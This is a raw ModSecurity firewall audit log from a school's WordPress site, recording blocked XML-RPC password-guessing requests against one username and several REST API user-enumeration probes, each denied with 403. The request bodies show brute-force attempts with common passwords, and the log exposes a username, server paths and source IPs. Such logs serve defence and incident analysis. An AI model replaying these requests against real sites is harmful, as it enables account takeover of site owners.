Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --191b714f-Z-- --002ef650-A-- [14/Jun/2025:10:47:04 +0700] aEzwuEMWfhkd5Y0sFtryDwAAAIM 103.236.140.4 48946 103.236.140.4 8181 --002ef650-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --002ef650-C-- wp.getUsersBlogs kresno 123qweasd --002ef650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --002ef650-E-- --002ef650-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872824656958 5316 (- - -) Stopwatch2: 1749872824656958 5316; combined=3741, p1=502, p2=3068, p3=0, p4=0, p5=100, sr=123, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --002ef650-Z-- --1a8ea76d-A-- [14/Jun/2025:10:48:27 +0700] aEzxC0MWfhkd5Y0sFtryGQAAAI8 103.236.140.4 49038 103.236.140.4 8181 --1a8ea76d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1a8ea76d-C-- wp.getUsersBlogs kresno Admin! --1a8ea76d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a8ea76d-E-- --1a8ea76d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872907221703 5971 (- - -) Stopwatch2: 1749872907221703 5971; combined=4103, p1=546, p2=3380, p3=0, p4=0, p5=105, sr=93, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a8ea76d-Z-- --d68f9a08-A-- [14/Jun/2025:10:49:27 +0700] aEzxR13g_boun6Rx5jLUuQAAANU 103.236.140.4 49114 103.236.140.4 8181 --d68f9a08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d68f9a08-C-- wp.getUsersBlogs kresno 123789 --d68f9a08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d68f9a08-E-- --d68f9a08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749872967705912 4297 (- - -) Stopwatch2: 1749872967705912 4297; combined=3331, p1=375, p2=2790, p3=0, p4=0, p5=96, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d68f9a08-Z-- --d6721860-A-- [14/Jun/2025:10:50:27 +0700] aEzxg0MWfhkd5Y0sFtryPQAAAIc 103.236.140.4 49190 103.236.140.4 8181 --d6721860-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d6721860-C-- wp.getUsersBlogs kresno adminadmin --d6721860-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6721860-E-- --d6721860-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873027347070 3749 (- - -) Stopwatch2: 1749873027347070 3749; combined=2884, p1=327, p2=2413, p3=0, p4=0, p5=84, sr=86, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6721860-Z-- --90f6ad6b-A-- [14/Jun/2025:10:51:28 +0700] aEzxwEMWfhkd5Y0sFtryZwAAAIs 103.236.140.4 49288 103.236.140.4 8181 --90f6ad6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --90f6ad6b-C-- wp.getUsersBlogs kresno admin234 --90f6ad6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90f6ad6b-E-- --90f6ad6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873088778188 4939 (- - -) Stopwatch2: 1749873088778188 4939; combined=3465, p1=427, p2=2879, p3=0, p4=0, p5=94, sr=87, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90f6ad6b-Z-- --9dae8b40-A-- [14/Jun/2025:10:52:29 +0700] aEzx_UMWfhkd5Y0sFtrytgAAAJM 103.236.140.4 49486 103.236.140.4 8181 --9dae8b40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9dae8b40-C-- wp.getUsersBlogs kresno qweqwe --9dae8b40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dae8b40-E-- --9dae8b40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873149328181 5996 (- - -) Stopwatch2: 1749873149328181 5996; combined=4082, p1=514, p2=3393, p3=0, p4=0, p5=104, sr=97, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dae8b40-Z-- --eced426c-A-- [14/Jun/2025:10:53:39 +0700] aEzyQ0MWfhkd5Y0sFtry3wAAAJA 103.236.140.4 49576 103.236.140.4 8181 --eced426c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --eced426c-C-- wp.getUsersBlogs kresno rockyou --eced426c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eced426c-E-- --eced426c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (41+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873219894669 5571 (- - -) Stopwatch2: 1749873219894669 5571; combined=3931, p1=520, p2=3238, p3=0, p4=0, p5=102, sr=107, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eced426c-Z-- --5d42c244-A-- [14/Jun/2025:10:54:15 +0700] aEzyZ0MWfhkd5Y0sFtry9gAAAJI 103.236.140.4 49630 103.236.140.4 8181 --5d42c244-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5d42c244-C-- wp.getUsersBlogs kresno 1234%^&* --5d42c244-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d42c244-E-- --5d42c244-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873255254834 4242 (- - -) Stopwatch2: 1749873255254834 4242; combined=3277, p1=343, p2=2769, p3=0, p4=0, p5=98, sr=76, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d42c244-Z-- --f528883b-A-- [14/Jun/2025:10:54:39 +0700] aEzyf2IDXuKmWNi2UBS6QgAAAFY 103.236.140.4 49724 103.236.140.4 8181 --f528883b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f528883b-C-- wp.getUsersBlogs kresno !@#1234 --f528883b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f528883b-E-- --f528883b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873279138383 4221 (- - -) Stopwatch2: 1749873279138383 4221; combined=3236, p1=350, p2=2612, p3=0, p4=0, p5=150, sr=82, sw=124, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f528883b-Z-- --c941c34b-A-- [14/Jun/2025:10:55:39 +0700] aEzyu0MWfhkd5Y0sFtrzNgAAAIw 103.236.140.4 49946 103.236.140.4 8181 --c941c34b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c941c34b-C-- wp.getUsersBlogs kresno softball --c941c34b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c941c34b-E-- --c941c34b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (110+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873339831748 5003 (- - -) Stopwatch2: 1749873339831748 5003; combined=3631, p1=406, p2=3054, p3=0, p4=0, p5=101, sr=86, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c941c34b-Z-- --1c27f851-A-- [14/Jun/2025:10:56:11 +0700] aEzy22IDXuKmWNi2UBS6gAAAAEs 103.236.140.4 50072 103.236.140.4 8181 --1c27f851-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.116.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.116.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c27f851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c27f851-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749873371011827 2055 (- - -) Stopwatch2: 1749873371011827 2055; combined=998, p1=339, p2=632, p3=0, p4=0, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c27f851-Z-- --5a17ac20-A-- [14/Jun/2025:10:56:39 +0700] aEzy90MWfhkd5Y0sFtrzngAAAIE 103.236.140.4 50164 103.236.140.4 8181 --5a17ac20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5a17ac20-C-- wp.getUsersBlogs kresno dakota --5a17ac20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a17ac20-E-- --5a17ac20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (103+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873399221065 4303 (- - -) Stopwatch2: 1749873399221065 4303; combined=3360, p1=380, p2=2809, p3=0, p4=0, p5=100, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a17ac20-Z-- --99d49661-A-- [14/Jun/2025:10:57:39 +0700] aEzzM0MWfhkd5Y0sFtrzwgAAAI0 103.236.140.4 50262 103.236.140.4 8181 --99d49661-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --99d49661-C-- wp.getUsersBlogs kresno manchester --99d49661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99d49661-E-- --99d49661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873459209700 4253 (- - -) Stopwatch2: 1749873459209700 4253; combined=3288, p1=344, p2=2775, p3=0, p4=0, p5=98, sr=79, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99d49661-Z-- --7ea9fe65-A-- [14/Jun/2025:10:58:39 +0700] aEzzb0MWfhkd5Y0sFtr0BQAAAI4 103.236.140.4 50414 103.236.140.4 8181 --7ea9fe65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ea9fe65-C-- wp.getUsersBlogs kresno a12345 --7ea9fe65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ea9fe65-E-- --7ea9fe65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749873519213697 4102 (- - -) Stopwatch2: 1749873519213697 4102; combined=3164, p1=352, p2=2646, p3=0, p4=0, p5=97, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ea9fe65-Z-- --9f618e1a-A-- [14/Jun/2025:11:22:04 +0700] aEz47EMWfhkd5Y0sFtr0LAAAAJc 103.236.140.4 50556 103.236.140.4 8181 --9f618e1a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.118.104.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9f618e1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f618e1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749874924944128 2943 (- - -) Stopwatch2: 1749874924944128 2943; combined=1293, p1=432, p2=826, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f618e1a-Z-- --55544c2e-A-- [14/Jun/2025:12:48:03 +0700] aE0NE0MWfhkd5Y0sFtr7VQAAAJM 103.236.140.4 59462 103.236.140.4 8181 --55544c2e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.211.253.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.211.253.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --55544c2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55544c2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: 